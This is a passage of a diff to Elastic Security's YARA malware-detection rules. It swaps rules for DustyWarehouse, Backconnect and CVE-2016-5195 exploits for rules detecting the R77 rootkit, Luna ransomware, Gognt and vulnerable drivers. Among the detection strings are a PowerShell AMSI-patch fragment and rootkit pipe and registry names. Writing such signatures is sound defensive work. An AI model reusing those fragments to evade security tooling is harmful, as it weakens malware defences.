= 75 tags = "FILE, MEMORY" - fingerprint = "e4d78229c1877a023802d7d99eca48bffc55d986af436c8a1df7c6c4e5e435ba" + fingerprint = "beaa87877382a0cba0fcad6397b22bef2ff6dad8e3454ae517b529fbc76ff97a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 49 8B 45 00 4C 8B 40 08 49 8D 78 18 49 89 FA 49 29 D2 49 01 C2 4C } + $a1 = { 8C 20 88 00 00 00 42 8B 44 21 10 42 8B 4C 21 1C 48 2B D0 49 } + $a2 = { 53 00 4F 00 46 00 54 00 57 00 41 00 52 00 45 00 5C 00 24 00 37 00 37 00 63 00 6F 00 6E 00 66 00 69 00 67 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Dustywarehouse_A6Cfc9F7 : FILE MEMORY +rule ELASTIC_Windows_Rootkit_R77_99050E7D : FILE MEMORY { meta: - description = "Detects Windows Trojan Dustywarehouse (Windows.Trojan.DustyWarehouse)" + description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" author = "Elastic Security" - id = "a6cfc9f7-6d4a-4904-8294-790243eca76a" - date = "2023-08-25" - modified = "2023-11-02" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DustyWarehouse.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8c4de69e89dcc659d2fff52d695764f1efd7e64e0a80983ce6d0cb9eeddb806c" - logic_hash = "2b4cd9316e2fda882c95673edecb9c82a03ef4fdcc2d2e25783644cc5dfb5bf0" + id = "99050e7d-b9b2-411f-b315-0ac7f556314c" + date = "2023-05-09" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Rootkit_R77.yar#L44-L64" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3dc94c88caa3169e096715eb6c2e6de1b011120117c0a51d12f572b4ba999ea6" + logic_hash = "0fedf4698cc652076090b1fe256d05d2c0bc3ad2ab7ed5faa270c5c7fe0efca1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a0ef31535c7df8669e2b0cf38e9128e662bf64decabac5c9f3dad3a98f811033" + fingerprint = "1fa724556616eed4adfe022602795ffc61fe64dd910b5b83fd7610933b79d71f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80743,32 +81259,29 @@ rule ELASTIC_Windows_Trojan_Dustywarehouse_A6Cfc9F7 : FILE MEMORY os = "windows" strings: - $a1 = "%4d.%2d.%2d-%2d:%2d:%2d" wide fullword - $a2 = ":]%d-%d-%d %d:%d:%d" wide fullword - $a3 = "\\sys.key" wide fullword - $a4 = "[rwin]" wide fullword - $a5 = "Software\\Tencent\\Plugin\\VAS" fullword + $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 24 00 37 00 37 00 63 00 68 00 69 00 6C 00 64 00 70 00 72 00 6F 00 63 00 36 00 34 00 } + $a2 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 24 00 37 00 37 00 63 00 68 00 69 00 6C 00 64 00 70 00 72 00 6F 00 63 00 33 00 32 00 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Dustywarehouse_3Fef514B : FILE MEMORY +rule ELASTIC_Windows_Rootkit_R77_Be403E3C : FILE MEMORY { meta: - description = "Detects Windows Trojan Dustywarehouse (Windows.Trojan.DustyWarehouse)" + description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" author = "Elastic Security" - id = "3fef514b-9499-47ce-bf84-8393f8d0260f" - date = "2024-05-30" - modified = "2024-06-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DustyWarehouse.yar#L25-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4ad024f53595fdd380f5b5950b62595cd47ac424d2427c176a7b2dfe4e1f35f7" - logic_hash = "865ea1e54950a465b71939a41f7a726ccddcfa9f0d777ea853926f65bca0da84" + id = "be403e3c-a70d-4126-b464-83060138c79b" + date = "2023-05-18" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Rootkit_R77.yar#L66-L85" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "91c6e2621121a6871af091c52fafe41220ae12d6e47e52fd13a7b9edd8e31796" + logic_hash = "efbf924c7a299f2543c639b6262007eb3bdbf6ff5e33dab7d6102814b9477811" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "077bc59b4b6298e405c1cd37d9416667371190e5d8c83a9a9502753c9065df58" + fingerprint = "46fd9d53771a0c6d14b364589a7cfa291a1c0405d74a97beac75db78faea7e0b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80776,28 +81289,28 @@ rule ELASTIC_Windows_Trojan_Dustywarehouse_3Fef514B : FILE MEMORY os = "windows" strings: - $a = { 48 83 EC 30 48 C7 44 24 20 FE FF FF FF 48 89 5C 24 48 48 89 74 24 50 C7 44 24 40 [4] 48 8B 39 48 8B 71 08 48 8B 59 10 48 8B 49 18 ?? ?? ?? ?? ?? ?? 84 DB 74 05 E8 E1 01 00 00 48 8B CE } + $a = { 33 C9 48 89 8C 24 C0 00 00 00 4C 8B CB 48 89 8C 24 B8 00 00 00 45 33 C0 48 89 8C 24 B0 00 00 00 48 89 8C 24 A8 00 00 00 89 8C 24 A0 00 00 00 } condition: - all of them + $a } -rule ELASTIC_Windows_Exploit_CVE_2022_38028_31Fdb122 : FILE MEMORY CVE_2022_38028 +rule ELASTIC_Windows_Rootkit_R77_Ee853C9F : FILE MEMORY { meta: - description = "Detects Windows Exploit Cve 2022 38028 (Windows.Exploit.CVE-2022-38028)" + description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" author = "Elastic Security" - id = "31fdb122-36fd-4fae-b605-542dc344575c" - date = "2024-06-06" - modified = "2024-06-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_CVE_2022_38028.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" - logic_hash = "df0ef11ce8e840c331d1db8f98917367dc2a33b6f1be48adb9d0b86729ecbe99" + id = "ee853c9f-97ec-45b2-8c67-7b86331f4946" + date = "2023-05-18" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Rootkit_R77.yar#L87-L112" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "916c805b0d512dd7bbd88f46632d66d9613de61691b4bd368e4b7cb1f0ac7f60" + logic_hash = "94f080f310ecace76da32ba2b4edcc80dedfb339113823708167c1d842db8cf3" score = 75 - quality = 73 - tags = "FILE, MEMORY, CVE-2022-38028" - fingerprint = "e489287412ee673f4d93c5efc9e61b5d26d877bb0f4ddf827926b4d5d87dc399" + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "a2bf137ff29044a1f80494aa4b51bd7aa49ae64808b9f1d4566750b9717b847d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80805,87 +81318,100 @@ rule ELASTIC_Windows_Exploit_CVE_2022_38028_31Fdb122 : FILE MEMORY CVE_2022_3802 os = "windows" strings: - $a = { 70 72 69 6E 74 54 69 63 6B 65 74 2E 58 6D 6C 4E 6F 64 65 2E 6C 6F 61 64 28 27 25 53 3A 2F 2F 67 6F 27 29 3B } + $r77_str0 = "$77stager" wide fullword + $r77_str1 = "$77svc32" wide fullword + $r77_str2 = "$77svc64" wide fullword + $r77_str3 = "\\\\.\\pipe\\$77childproc64" wide fullword + $r77_str4 = "SOFTWARE\\$77config" + $obfuscate_ps = { 0F B7 04 4B 33 D2 C7 45 FC 34 00 00 00 F7 75 FC 66 8B 44 55 90 66 89 04 4B 41 3B CE } + $amsi_patch_ps = "[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3)" wide fullword condition: - all of them + ($obfuscate_ps and $amsi_patch_ps) or ( all of ($r77_str*)) } -rule ELASTIC_Linux_Trojan_Backconnect_C6803B39 : FILE MEMORY +rule ELASTIC_Windows_Rootkit_R77_D0367E28 : FILE MEMORY { meta: - description = "Detects Linux Trojan Backconnect (Linux.Trojan.Backconnect)" + description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" author = "Elastic Security" - id = "c6803b39-e2e0-4ab8-9ead-e53eab26bb53" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Backconnect.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a5e6b084cdabe9a4557b5ff8b2313db6c3bb4ba424d107474024030115eeaa0f" - logic_hash = "02750b2788c2912bba0fc8594f6a12c75ce1f41d1075acf7c920f6e616ab65c7" + id = "d0367e28-2c37-45c8-8a74-7ea881f2d471" + date = "2023-05-18" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Rootkit_R77.yar#L114-L141" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "96849108e13172d14591169f8fdcbf8a8aa6be05b7b6ef396d65529eacc02d89" + logic_hash = "588b18c54c344ca267b86143df20c7dcaab081e0ef6acae0bd0dae61593eb521" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1dfb097c90b0cf008dc9d3ae624e08504755222f68ee23ed98d0fa8803cff91a" + fingerprint = "c3f6fe38fcc2ec40ae7c033e37f7a2830f5d53f0e796281bd484bdb65502cd0e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 78 3A 48 98 48 01 C3 49 01 C5 48 83 FB 33 76 DC 31 C9 BA 10 00 } + $str0 = "service_names" wide fullword + $str1 = "process_names" wide fullword + $str2 = "tcp_local" wide fullword + $str3 = "tcp_remote" wide fullword + $str4 = "startup" wide fullword + $str5 = "ReflectiveDllMain" ascii fullword + $str6 = ".detourd" ascii fullword + $binary0 = { 48 8B 10 48 8B 0B E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 08 48 8B 4B 08 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 10 48 8B 4B 10 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 18 48 8B 4B 18 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 20 48 8B 4B 20 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 28 48 8B 4B 28 E8 ?? ?? ?? ?? 85 C0 } + $binary1 = { 8B 56 04 8B 4F 04 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 08 8B 4F 08 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 0C 8B 4F 0C E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 10 8B 4F 10 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 14 8B 4F 14 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 18 8B 4F 18 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 1C 8B 4F 1C } condition: - all of them + ( all of ($str*)) or $binary0 or $binary1 } -rule ELASTIC_Windows_PUP_Generic_198B73Aa : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gognt_50C3D9Da : FILE MEMORY { meta: - description = "Detects Windows Pup Generic (Windows.PUP.Generic)" + description = "Detects Linux Trojan Gognt (Linux.Trojan.Gognt)" author = "Elastic Security" - id = "198b73aa-d7dd-4f28-bf1c-02672a03d031" - date = "2023-07-27" - modified = "2023-09-20" + id = "50c3d9da-0392-4379-aafe-cfe63ade3314" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_PUP_Generic.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "a584c34b9dfc2d78bf8a1e594a2ed519d20088184ce1df09e679b2400aa396d3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gognt.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "79602bc786edda7017c5f576814b683fba41e4cb4cf3f837e963c6d0d42c50ee" + logic_hash = "ecd9cd94b3bf8c50c347e70aab3da03ea6589530b20941a9f62dac501f8144fc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "23c11df4ce2ec2d30b1916b73fc94a84b6a817c1686905fd69fa7a6528798d5f" + fingerprint = "a4b7e0c7c2f1b0634f82106ec0625bcdde02296b3e72c9c3aa9c16e40d770b43" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "[%i.%i]av=[error]" fullword - $a2 = "not_defined" fullword - $a3 = "osver=%d.%d-ServicePack %d" fullword + $a = { 00 00 00 47 6F 00 00 51 76 46 5F 6F 30 59 36 55 72 5F 6C 63 44 } condition: all of them } -rule ELASTIC_Linux_Trojan_Sfloost_69A5343A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gognt_05B10F4B : FILE MEMORY { meta: - description = "Detects Linux Trojan Sfloost (Linux.Trojan.Sfloost)" + description = "Detects Linux Trojan Gognt (Linux.Trojan.Gognt)" author = "Elastic Security" - id = "69a5343a-4885-4d88-9eaf-ddfcc95e1f39" + id = "05b10f4b-7434-457a-9e8e-d898bb839dce" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sfloost.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0cd73db5165671c7bbd9493c34d693d25b845a9a21706081e1bf44bf0312ef9" - logic_hash = "bd3cd33d02c7ca1d3a0364e5e3e2f968f32da8f087f744232f3cb786da6c7875" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gognt.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e43aaf2345dbb5c303d5a5e53cd2e2e84338d12f69ad809865f20fd1a5c2716f" + logic_hash = "1dfc3417f75aa81aea5eda3d6da076f1cacf82dbfc039252b1d16f52b81a5a65" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c19368bf04e4b67537a8573b5beba56bab8bcfdf870640ef5bd46d40735ee539" + fingerprint = "fdf7b65f812c17c7f30b3095f237173475cdfb0c10a4b187f751c0599f6b5729" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80893,29 +81419,29 @@ rule ELASTIC_Linux_Trojan_Sfloost_69A5343A : FILE MEMORY os = "linux" strings: - $a = { 0F 83 C8 50 88 43 0C 0F B6 45 F0 66 C7 43 10 00 00 66 C7 43 12 } + $a = { 7C 24 78 4C 89 84 24 A8 00 00 00 48 29 D7 49 89 F9 48 F7 DF 48 C1 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Speedfan_9B590Eee : FILE +rule ELASTIC_Windows_Vulndriver_Llaccess_C57534E8 : FILE { meta: - description = "Subject: Sokno S.R.L." + description = "Name: Corsair LL Access, Version: 1.0.18.0" author = "Elastic Security" - id = "9b590eee-5938-4293-afac-c9e730753413" - date = "2022-04-07" - modified = "2022-04-07" + id = "c57534e8-eb38-4714-9262-c489cc6204f1" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Speedfan.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c" - logic_hash = "6f75c0e6b89dd1ceb85c73b7e51fd261ca2804e14a5f8ed6ce3352b3f1bcdfe4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_LLAccess.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b" + logic_hash = "8bf629fd2ce0b1f15c7aacd573659b649dcf968556232683b29d68b27d12e577" score = 75 quality = 75 tags = "FILE" - fingerprint = "c58a8c3bfa710896c35262cc880b9afbadcdfdd73d9969c707e7b5b64e6a70b5" - threat_name = "Windows.VulnDriver.Speedfan" + fingerprint = "2eea8941c92353442f7a8986fa3abee06f83824e48bd6a3a5012f7cf76cd543e" + threat_name = "Windows.VulnDriver.LLAccess" severity = 50 arch_context = "x86" scan_context = "file" @@ -80923,115 +81449,123 @@ rule ELASTIC_Windows_Vulndriver_Speedfan_9B590Eee : FILE os = "windows" strings: - $subject_name = { 06 03 55 04 03 [2] 53 6F 6B 6E 6F 20 53 2E 52 2E 4C 2E } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 43 00 6F 00 72 00 73 00 61 00 69 00 72 00 20 00 4C 00 4C 00 20 00 41 00 63 00 63 00 65 00 73 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x12][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x11][\x00-\x00]))/ condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $subject_name + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_364F3B7B : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Multi_Ransomware_Luna_8614D3D7 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Multi Ransomware Luna (Multi.Ransomware.Luna)" author = "Elastic Security" - id = "364f3b7b-4361-44ca-bf49-e26c123ae4bd" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d4c43bf0cdd6486a4bcab988517e58b8c15d276f41600e596ecc28b0b728e69" - logic_hash = "5950195453232e4752b58c9e466c4df1b5ca2b22d5325730de69cd4178438aa7" + id = "8614d3d7-7fd2-4cf9-aa97-48a8d9333f38" + date = "2022-08-02" + modified = "2022-08-16" + reference = "https://www.elastic.co/security-labs/luna-ransomware-attack-pattern" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Ransomware_Luna.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51" + logic_hash = "14e40c5b1a21ba31664ed31b04bfc4a8646b3e31f96d39e0928a3d6a50d79307" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "ec6cf1d090cd57434c4d3c1c3511fd4b683ff109bfd0ce859552d58cbb83984a" + tags = "FILE, MEMORY" + fingerprint = "90c97ecfce451e1373af0d7538cf12991cc844d05c99ee18570e176143ccd899" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "multi" strings: - $a = { 9C 01 7E 24 48 8B 45 90 48 8B 40 08 48 89 45 F8 48 8B 45 F8 48 } + $str_extensions = ".ini.exe.dll.lnk" + $str_ransomnote_bs64 = "W1dIQVQgSEFQUEVORUQ/XQ0KDQpBbGwgeW91ciBmaWxlcyB3ZXJlIG1vdmVkIHRvIHNlY3VyZSBzdG9yYWdlLg0KTm9ib" + $str_path = "/home/username/" + $str_error1 = "Error while writing encrypted data to:" + $str_error2 = "Error while writing public key to:" + $str_error3 = "Error while renaming file:" + $chunk_calculation0 = { 48 8D ?? 00 00 48 F4 48 B9 8B 3D 10 B6 9A 5A B4 36 48 F7 E1 48 } + $chunk_calculation1 = { 48 C1 EA 12 48 89 D0 48 C1 E0 05 48 29 D0 48 29 D0 48 3D C4 EA 00 00 } condition: - all of them + 5 of ($str_*) or all of ($chunk_*) } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_3A2Ed31B : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Windows_Vulndriver_Winio_C9Cc6D00 : FILE { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Windows Vulndriver Winio (Windows.VulnDriver.WinIo)" author = "Elastic Security" - id = "3a2ed31b-a8be-4aff-af5e-e1ff2676f3f9" - date = "2021-01-12" - modified = "2021-09-16" + id = "c9cc6d00-b1ed-4bab-b0f7-4f0d6c03bf08" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ebbf3bc39ec661e2029d88960a5608e348de92089099019348bc0e891841690f" - logic_hash = "30cd10e38cbda719d9c344efd813e9a19e738a5251e3622957c8349e94366a29" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_WinIo.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf" + logic_hash = "4b6a78c2c807cf1f569ae9bc275d42d9c895efba7a2d64fec0652e3cb163d553" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "0e8e0f58deadf4838464c2f2bc860013e6d47c3d770d0ef743b5dd9021832cae" - severity = 100 + tags = "FILE" + fingerprint = "d9050466a2894b63ae86ec8888046efb49053edcc20287b9f17a4e6340a9cf92" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 55 48 89 E5 48 83 EC 30 48 89 7D D8 48 8B 45 D8 48 89 45 F0 BE 02 00 } + $str1 = "\\WinioSys.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_7448814C : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Windows_Vulndriver_Winio_B0F21A70 : FILE { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Windows Vulndriver Winio (Windows.VulnDriver.WinIo)" author = "Elastic Security" - id = "7448814c-1685-45a9-9a00-039b30485545" - date = "2021-01-12" - modified = "2021-09-16" + id = "b0f21a70-b563-4b18-8ef9-73885125e88b" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e95d0783b635e34743109d090af17aef2e507e8c90060d171e71d9ac79e083ba" - logic_hash = "0024b2cc22bf6c2dfc3b73ba91080cea8d502659db38d94b19338382e2fc0c84" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_WinIo.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374" + logic_hash = "c82d95e805898f9a9a1ffccb483e506df0a53dc420068314e7c724e4947f3572" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "25ffa8f3b2356deebc88d8831bc8664edd6543a7d722d6ddd72e89fad18c66e7" - severity = 100 + tags = "FILE" + fingerprint = "00d8142a30e9815f8e4c53443221fc1c3882c8b6f68e77a8ed7ffe4fc8852488" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 9C 01 7E 24 48 8B 45 90 48 8B 40 08 48 89 45 C0 48 8B 45 C0 48 } + $str1 = "IOCTL_WINIO_WRITEMSR" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_2Fa988E3 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_47C64Fb6 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "2fa988e3-dfaf-44c8-bfaa-889778858e22" + id = "47c64fb6-cfa6-4350-a41f-870b87116b32" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "679392e78d4abefc05b885e43aaccc2da235bd7f2a267c6ecfbe2cf824776993" - logic_hash = "55c3992ca62ebaf8d45aff818d3261838d239f2004125689ea81edca2cfa59c2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0caa9035027ff88788e6b8e43bfc012a367a12148be809555c025942054a6360" + logic_hash = "7d977edd5fc90c6f03ed5558c690b3dd2102bbff9d7e5124403276405e15201b" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "a841f4b929c79eadfa8deeb3a6f410056aec94dd1e0d9c8e5dc31675de936403" 